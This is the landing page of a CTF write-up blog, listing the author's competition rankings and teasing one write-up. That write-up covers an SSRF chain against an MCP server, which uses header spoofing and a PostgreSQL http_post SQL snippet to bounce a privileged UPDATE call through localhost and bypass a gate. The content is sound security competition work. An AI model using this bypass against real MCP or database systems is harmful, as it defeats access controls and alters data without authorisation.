CTF writeups by moeve. Captures, chains and the occasional rabbit hole.

Security & infrastructure engineer in Germany, CTF player by night. I write up the chains I find interesting.
What worked, what didn't, dead ends included.

Featured writeup

AI Nov 28, 2025 · Neurogrid 2025

Cross-protocol SSRF into MCP guardian tool

MCP server gates a privileged UPDATE tool behind a localhost check. Header spoofing fools the read-only tool; chain it with PostgreSQL's http_post to bounce the call back through 127.0.0.1 and bypass the gate.

MCPSSRFPostgreSQLLLM

read the writeup →

ink_vaults.sql L1–8

1SELECT http((
2  'POST', 'http://localhost:3000/mcp',
3  ARRAY[ http_header('Authorization', 'Bearer sacred_…') ],
4  'application/json',
5  '{"name":"guardian_query_sql",
6    "arguments":{"query":"UPDATE scrolls SET availability=''Available'' WHERE id=7"}}'
7)::http_request);
8-- spoofed read tool → PG http_post → guardian UPDATE

CTF log

May 2026 season

HTB Season 10: Underground

3-month competitive ranking · Claude Code agents, mostly hands-off · solo · agentic

#135 of 12,294

top 1.1%

Dec 2025 season

HTB Season 9: Gacha

3-month competitive ranking · solo

#67 of 9,850

top 0.68%

Nov 2025 ctf

Neurogrid CTF: Human-Only★ featured

HTB CTF · solo run · solo

WEB·PWN·REVERSING·CRYPTO·AI·BLOCKCHAIN·FORENSICS·CODING·SEC-CODE

#4 of 1,337

top 0.30%

Nov 2025 season

OffSec Gauntlet 2025

2-month season · OffSec · solo

#51 of 4,267

top 1.2%

Oct 2025 ctf

Hack The Boo 2025

23/23 solved · 1× first blood · solo

WEB·PWN·REVERSING·CRYPTO·FORENSICS·CODING

#5 of 2,893

top 0.17%

Sep 2025 ctf

Amazon AppSec CTF 2025

EMEA · invite-only · solo

#16 of 141

top 11.3%

Sep 2025 ctf

Holmes Defensive CTF

DFIR · SOC · malware · threat hunting · team Legendary Queue

#118 of 7,085

top 1.7%

Jun 2025 ctf

Hack The System

Bug-bounty CTF · 5/5 solved · team Legendary Queue

#10 of 1,323

top 0.76%

Mar 2025 ctf

Cyber Apocalypse 2025

Tales from Eldoria · 74/77 solved · team DOMBUSTERS

#47 of 8,130

top 0.58%